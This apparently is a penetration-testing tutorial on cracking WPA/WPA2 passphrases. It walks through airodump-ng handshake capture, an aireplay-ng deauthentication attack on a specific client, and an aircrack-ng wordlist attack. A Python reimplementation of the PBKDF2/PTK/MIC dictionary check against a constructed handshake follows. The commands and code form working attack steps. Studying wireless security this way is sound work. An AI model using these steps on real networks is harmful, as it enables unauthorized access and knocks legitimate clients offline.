Let’s see how we can use Aircrack-ng to crack a WPA/WPA2 network (the same workflow, with the same tools, applies to both; only the final key derivation differs):
Step 2—Next, we listen on the mon0 interface for nearby access points whose encryption is set to WPA or WPA2. The “airodump-ng mon0” command does this (airmon-ng only creates the monitor-mode interface; airodump-ng is the tool that scans and captures on it).
Our target AP is Shaxter, which uses WPA as its encryption type. We take note of its BSSID and the channel it is on; both are needed in the upcoming steps. BSSID: F4:3E:61:92:68:D7, channel 1.
Step 3—Next, we save the traffic of our target access point to a capture file. The inputs we need to specify are the channel, the BSSID, and the file name prefix to write to.
Command: airodump-ng -c 1 -w rhawap --bssid F4:3E:61:92:68:D7 mon0
◾ -c—Channel to lock the card on (hopping across channels would miss handshake frames)
◾ -w—File name prefix; airodump-ng appends a sequence number, so the capture is written to rhawap-01.cap
◾ --bssid—Only record frames to and from this access point
Leave this command running in its own terminal for the remaining steps; the deauthentication in the next step is sent from a second terminal while airodump-ng keeps capturing.
Capturing the Four-Way Handshake
Step 4—In order to crack WPA or WPA2, we need to capture the four-way handshake, which only takes place when a client (re)associates with the access point. As mentioned, we can force this with a deauthentication attack: spoofed deauthentication frames make a connected client disconnect and reconnect, and the handshake it performs on reconnection is recorded by the airodump-ng session from step 3.
Structure
aireplay-ng --deauth <count> -a <BSSID of target AP> -c <MAC of a client associated with the AP> mon0
Command: aireplay-ng --deauth 10 -a F4:3E:61:92:68:D7 -c 94:39:E5:EA:85:31 mon0
◾ --deauth 10—Number of deauthentication rounds to send (0 means keep sending until stopped)
◾ -a—BSSID of the target access point
◾ -c—Destination MAC, i.e. the station to kick off; take it from the client list in the lower half of the airodump-ng screen. It is not the MAC of mon0: deauthenticating our own, unassociated interface would produce no handshake. If -c is omitted, aireplay-ng broadcasts the deauthentication to every client of the AP.
After the deauthentication attack has succeeded and the client reconnects, the four-way handshake lands in the capture; airodump-ng confirms this by showing “WPA handshake: F4:3E:61:92:68:D7” in the top-right corner of its screen. If that marker does not appear, repeat the attack, since a client that has switched to another network or a badly timed burst leaves nothing to crack.
Cracking WPA/WPA2
Now that we have all the inputs required for cracking the WPA/WPA2 PSK, we use aircrack-ng and specify a wordlist to run against the capture file generated earlier. Remember that the file must contain the four-way handshake: the only value in the capture that depends on the passphrase is the MIC of the handshake messages, so without the handshake there is nothing for aircrack-ng to test candidate passphrases against.
Structure
aircrack-ng -w <wordlist> <capture_file>.cap
Command: aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst rhawap-01.cap
This starts the dictionary attack against rhawap-01.cap: every wordlist entry is expanded into a PMK, used to derive the key that protects the handshake, and checked against the captured MIC. If the passphrase is in the dictionary, aircrack-ng reports it as “KEY FOUND!”; if the wordlist is exhausted without a match, the passphrase was simply not in the list, and no amount of additional capture will change that.
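What aircrack-ng does with each wordlist entry, as an added example that is not part of the original page and is not aircrack-ng’s own code: the candidate passphrase and SSID go through PBKDF2-HMAC-SHA1 to give the PMK, the PMK plus both MAC addresses and both nonces go through the 802.11i PRF-512 to give the PTK, and the first 16 bytes of the PTK (the KCK) are used to recompute the MIC of the captured EAPOL-Key frame. The SSID “Shaxter”, BSSID and client MAC are taken from the page; the nonces, the EAPOL frame and the passphrase “rhawap123” are constructed for the demonstration (a real run parses them out of rhawap-01.cap, which this example does not do).

```python
"""Dictionary attack on a WPA/WPA2-PSK four-way handshake.

Added example, not aircrack-ng's code: it reproduces the per-candidate
computation aircrack-ng runs (PBKDF2 -> PMK, PRF-512 -> PTK, MIC check).
Nonces, EAPOL frame and passphrase below are constructed test values;
only the SSID, BSSID and client MAC come from the page.
"""
import hashlib
import hmac
from typing import Optional

# Offsets inside an EAPOL-Key frame (4-byte EAPOL header, then the key body).
KEY_INFO_OFF = 5          # 2-byte Key Information field
MIC_OFF = 81              # 16-byte Key MIC field
MIC_END = MIC_OFF + 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", B) with
    B = min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce).
    Only the first 16 bytes (the KCK) are needed to verify the handshake MIC."""
    b = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
         + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC over the EAPOL frame with its MIC field zeroed.
    Key Descriptor Version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP)
    uses HMAC-SHA1 truncated to 16 bytes."""
    version = int.from_bytes(eapol_frame[KEY_INFO_OFF:KEY_INFO_OFF + 2], "big") & 0x7
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    zeroed = eapol_frame[:MIC_OFF] + b"\x00" * 16 + eapol_frame[MIC_END:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_psk(hs: dict, wordlist) -> Optional[str]:
    """Return the first wordlist entry whose derived KCK reproduces the captured
    MIC, or None if the list is exhausted; this is aircrack-ng's inner loop."""
    captured_mic = hs["eapol"][MIC_OFF:MIC_END]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 characters
            continue
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"],
                           hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured_mic):
            return candidate
    return None


def build_eapol_key_frame(snonce: bytes, key_info: int,
                          mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal RSN (WPA2) EAPOL-Key message 2 with an empty Key Data field."""
    body = (bytes([2])                        # descriptor type 2 = RSN
            + key_info.to_bytes(2, "big")     # key information
            + (16).to_bytes(2, "big")         # key length (CCMP)
            + (1).to_bytes(8, "big")          # replay counter
            + snonce + b"\x00" * 16           # key nonce, key IV
            + b"\x00" * 8 + b"\x00" * 8       # key RSC, key ID
            + mic + (0).to_bytes(2, "big"))   # key MIC, key data length
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key


def constructed_handshake(passphrase: str = "rhawap123") -> dict:
    """Constructed stand-in for the fields aircrack-ng extracts from the capture:
    the MIC is generated here from `passphrase`, so this is not a real handshake."""
    hs = {
        "ssid": "Shaxter",
        "ap_mac": bytes.fromhex("F43E619268D7"),   # BSSID from the page
        "sta_mac": bytes.fromhex("9439E5EA8531"),  # client MAC from the page's deauth
        "anonce": bytes(range(32)),                # constructed nonces
        "snonce": bytes(range(32, 64)),
    }
    frame = build_eapol_key_frame(hs["snonce"], 0x010A)  # version 2, pairwise, MIC bit
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]), hs["ap_mac"],
                       hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    hs["eapol"] = frame[:MIC_OFF] + eapol_mic(kck, frame) + frame[MIC_END:]
    return hs


if __name__ == "__main__":
    wordlist = ["password", "letmein", "rhawap123", "Shaxter2014"]  # constructed
    print("KEY FOUND:", crack_psk(constructed_handshake(), wordlist))
```

Two things the code makes visible that the command line hides. The MIC is the only value in the capture that depends on the passphrase, which is why a capture without message 2 or 4 of the handshake cannot be cracked at all, and why a second handshake from the same client is a good idea (a corrupted frame fails every candidate). Almost all of the cost is the 4096 PBKDF2 iterations per candidate; the PRF and HMAC afterwards are cheap, which is why precomputed PMK tables only help for a fixed SSID.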